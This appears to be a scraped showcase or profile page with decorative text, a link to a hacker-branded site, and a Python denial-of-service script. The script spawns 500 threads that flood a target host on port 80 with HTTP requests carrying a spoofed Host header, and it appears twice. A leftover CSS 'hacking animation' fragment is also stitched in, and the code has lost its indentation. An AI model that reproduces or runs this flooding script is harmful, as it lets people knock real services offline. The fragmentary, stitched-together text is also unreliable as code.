Moon
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ I⠀D ⠀/⠀M o o n
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    ▬▬▬▬▬▬▬▬▬▬▬
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    ɢ ʀ ᴏ ᴜ ᴘ ⠀|⠀ ᴍ ᴜ s ɪ ᴄ ⠀|⠀ ᴏ ᴛ ʜ ᴇ ʀ [www.anonymoushackers.net]
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ I⠀D ⠀/⠀M o o n
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    ▬▬▬▬▬▬▬▬▬▬▬
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    ɢ ʀ ᴏ ᴜ ᴘ ⠀|⠀ ᴍ ᴜ s ɪ ᴄ ⠀|⠀ ᴏ ᴛ ʜ ᴇ ʀ [www.anonymoushackers.net]
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
Artwork Showcase
.
import socket
import threading

target = '10.0.0.138'
fake_ip = '182.21.20.32'
port = 80

def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()

for i in range(500):
thread = threading.Thread(target=attack)
thread.start()

attack_num = 0
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))

global attack_num
attack_num += 1
print(attack_num)
s.close()
..
html, body {
height: 100%;
margin: 0;
padding: 0;
}

.hacking-animation {
background: #000;
height: 100%;

&__text {
bottom: 0;
font-family: monospace;
font-size: 18px;
left: 0;
line-height: 1.5rem;
padding: 2rem;
position: absolute;
right: 0;
}

&__character {
animation: type 500ms linear;
color: #00a000;
}
}

@keyframes type {
0% {
background: #FFF;
color: #FFF;
Screenshot Showcase
Screenshot Showcase
Artwork Showcase